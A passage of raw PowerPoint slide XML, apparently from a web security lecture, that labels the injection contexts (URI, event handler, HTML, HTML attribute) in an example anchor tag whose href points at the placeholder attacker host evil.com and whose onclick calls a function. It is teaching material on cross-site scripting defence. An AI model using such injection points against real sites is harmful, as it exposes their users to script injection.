              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2763519" y="4383023"/>
            <a:ext cx="2194560" cy="754380"/>
            <a:chOff x="2072639" y="3287267"/>
            <a:chExt cx="1645920" cy="565785"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2072639" y="3291839"/>
              <a:ext cx="1645919" cy="504444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="object 7"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2164079" y="3287267"/>
              <a:ext cx="1511808" cy="565404"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2133599" y="3333749"/>
              <a:ext cx="1524000" cy="381000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1524000" h="381000">
                  <a:moveTo>
                    <a:pt x="1524000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524000" y="381000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1524000" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C0504D"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2844800" y="4445001"/>
            <a:ext cx="2032000" cy="411224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="41487" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281932">
              <a:spcBef>
                <a:spcPts val="327"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Context</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8859520" y="5195823"/>
            <a:ext cx="3332480" cy="754380"/>
            <a:chOff x="6644640" y="3896867"/>
            <a:chExt cx="2499360" cy="565785"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6644640" y="3901439"/>
              <a:ext cx="2484120" cy="492252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6664452" y="3896867"/>
              <a:ext cx="2479548" cy="565404"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6705600" y="3943349"/>
              <a:ext cx="2362200" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2362200" h="369570">
                  <a:moveTo>
                    <a:pt x="2362200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362200" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C0504D"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="object 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6705600" y="3943349"/>
              <a:ext cx="2362200" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2362200" h="369570">
                  <a:moveTo>
                    <a:pt x="0" y="369328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2362200" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2362200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="917787" y="4921233"/>
            <a:ext cx="11004127" cy="755762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" u="heavy" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="8000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>http://evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" u="heavy" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="8000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>functionCall()</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:tabLst>
                <a:tab pos="8209921" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" u="heavy" spc="-13" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Possibly</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" u="heavy" spc="-13" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/b&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="7" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" u="heavy" spc="-13" dirty="0">
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Text</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-13" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Event</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Handler</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Context</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4998720" y="5655055"/>
            <a:ext cx="2702560" cy="754380"/>
            <a:chOff x="3749040" y="4241291"/>
            <a:chExt cx="2026920" cy="565785"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3749040" y="4245863"/>
              <a:ext cx="2026919" cy="492252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="18" name="object 18"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3921252" y="4241291"/>
              <a:ext cx="1731264" cy="565404"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="object 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="4287621"/>
              <a:ext cx="1905000" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1905000" h="369570">
                  <a:moveTo>
                    <a:pt x="1905000" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905000" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905000" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C0504D"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3810000" y="4287621"/>
              <a:ext cx="1905000" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1905000" h="369570">
                  <a:moveTo>
                    <a:pt x="0" y="369328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1905000" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1905000" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="5716828"/>
            <a:ext cx="2540000" cy="412078"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="42333" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="389457">
              <a:spcBef>
                <a:spcPts val="333"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Context</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="object 22"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7855706" y="4064001"/>
            <a:ext cx="3796453" cy="754380"/>
            <a:chOff x="5891779" y="3048000"/>
            <a:chExt cx="2847340" cy="565785"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="23" name="object 23"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5891779" y="3061716"/>
              <a:ext cx="2846841" cy="475488"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="object 24"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6030467" y="3048000"/>
              <a:ext cx="2619756" cy="565404"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="object 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943599" y="3094596"/>
              <a:ext cx="2743200" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2743200" h="369570">
                  <a:moveTo>
                    <a:pt x="2743200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743200" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="C0504D"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5943599" y="3094596"/>
              <a:ext cx="2743200" cy="369570"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2743200" h="369570">
                  <a:moveTo>
                    <a:pt x="0" y="369328"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2743200" y="369328"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2743200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="369328"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8265838" y="4151036"/>
            <a:ext cx="2977727" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Attribute Context</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
